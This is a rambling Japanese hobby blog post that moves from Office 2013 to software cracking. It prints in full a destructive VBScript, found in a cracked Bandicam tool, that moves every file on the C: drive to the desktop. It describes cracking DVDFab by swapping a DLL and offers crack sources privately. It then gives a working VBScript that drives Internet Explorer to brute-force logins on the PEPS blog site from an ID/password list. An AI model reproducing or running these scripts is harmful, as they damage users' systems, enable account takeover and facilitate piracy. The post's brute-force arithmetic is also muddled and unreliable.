現ナマ速報!!(ナマ速)

お金になる情報や、FX、株、金融に関する情報や管理人のトレード履歴などをまとめて、一挙公開をしていくサイトです!! 管理人は、株やFXは初心者なので、教えていただけると非常にありがたいです。

    カテゴリ:PC > ソフトウェアー

    新しいPCに変えたので新しい気分になりたいので、Officeを2013にしました。
    どんな画面?
    それは、Windows8に合わせている気が僕はする。僕のPCはWin7です。祖父母の家のPCがWIn8なのでわかります。
    Win8はいいですよ。WindowsStorが使えます。僕も欲しいなお金さえあれば今すぐにでも買いたい。
    Win7が動くのに買うのは学生の身分ですのでお金の乏しいので無理です。

    本題のOutLookのスクリーンショット
    OutLook.png
    個人情報を全て消してアップしております。

    Bandicamの裏ツールを解答して導入してみたら、いきなりぱっと消えて、画面真っ白、よからぬファイルがずらずらと出てきて、おいこれをデスクトップに配置したら、起動できなくなるだろと思うファイルがたくさんどっさり出てきました。

    一度ソースを調べたら,
    ~srcは.vbsです。~
    set fso=wscript.createobject("scripting.filesystemobject")
    set wshshell=createobject("wscript.shell")

    deskpath=wshshell.specialfolders("desktop") & "\"

    set cfolders=fso.getfolder("C:\").subfolders

    for each cfolder in cfolders
    saiki (cfolder.path)
    next



    sub saiki(folderspec)
    set objfolder=fso.getfolder(folderspec)
    set objfiles=objfolder.files

    on error resume next
    for each objfile in objfiles
    on error resume next

    fso.movefile objfile,deskpath


    next


    set objsubfolders=objfolder.subfolders
    for each objsubfolder in objsubfolders
    call saiki(objsubfolder.path)
    next
    end sub



    災厄ですよね。
    desktopに配置しますというプログラムが入っています。

    クラック方法
    swscale-2.dllというファイルを置き換えるだけでできました。
    どうやって調べているのでしょうか?不思議に思えます。
    現時点でDVDFab9.0.4.5までクラックが可能だということです。
    RSSによりしりました。自動でダウンロードされます。
    どこのサイトにあるのかは個人的に聞いてください。
    FC2で友達登録をしてください。
    そして、メールで教えます。

    あるYahoo知恵袋のほうにあったソフトです。もちろんオープンソースでした。
    ブルーフォースアタックとは、"A~Z""1~9""記号"のランダムに指定した。組み合わせを決められた、桁まで続けます。たとえばわけのわからないZIPファイルをダウンロードしました。その時にパスワードがかかっているのです。とりあえず解析ソフトを使用します。PIKAZIPなど!!そうすると、記号 数字 英小文字 英大文字をか添えると、250個あります。たいていの場合は10桁目まで出したらいいです。となると250の10乗です。すごい数です。計算したい方はどうぞ!!大体1秒間に500文字アタックです。
    今から紹介する、のはYahooの知恵袋のほうにあったプログラム表のバックアップです。
    PEPSという、ブログサイトのブルーフォースアタックができるそうです。

    これを本体だそうです。
    名前は好きな名前でいいです。どこでもいいので保存しましょう。
    名前の書き方、”好きな名前.vbs"ですよ。



    myPAGE = "http://c.peps.jp/pc/login.php" '"http://peps.jp/"

    Set myIE = CreateObject("InternetExplorer.application")
    myIE.Visible = True
    myIE.Navigate myPAGE
    mySTOP(myIE) '読み込むまで待つ

    Set myFS = CreateObject("Scripting.FileSystemObject")
    With myFS.GetFile("C:\アイデパス.txt").OpenAsTextStream
    '----------------------------------------------------
    Do
    If .AtEndOfLine Then Exit Do 'データ終了で脱出
    myID = .ReadLine '1行読み込み
    myPS = Mid(myID, InStr(1, myID, "+") + 1)
    myID = Mid(myID, 1, InStr(1, myID, "+") - 1)

    myIE.Document.forms(1).id.Value = myID
    myIE.Document.forms(1).ps.Value = myPS
    myIE.Document.forms(1).submit

    mySTOP(myIE) '読み込むまで待つ
    If myIE.Document.forms(1).id = undefined Then
    Msgbox "通過しました"
    wscript.quit
    End If

    myIE.Navigate myPAGE '元のページに戻る
    mySTOP(myIE) '読み込むまで待つ
    Loop
    .Close 'クローズ
    End With
    msgbox "最後までおわりました"
    '----------------------------------------------------
    Sub mySTOP(myIE) 'まちあわせる共通処理
    Do
    If myIE.Busy = False Then Exit Do
    Loop
    Do
    If myIE.Document.readyState = "complete" Then Exit Do
    Loop



    これが何があるのかをプログラムされている情報これはサブアイテムです。
    これは上のソースを見てわかるとおりCドライブのルートに保存してください。"アイデアパス.txt"という名前です。




    A123+b456
    c789+d0123
    e456+f789

    このページのトップヘ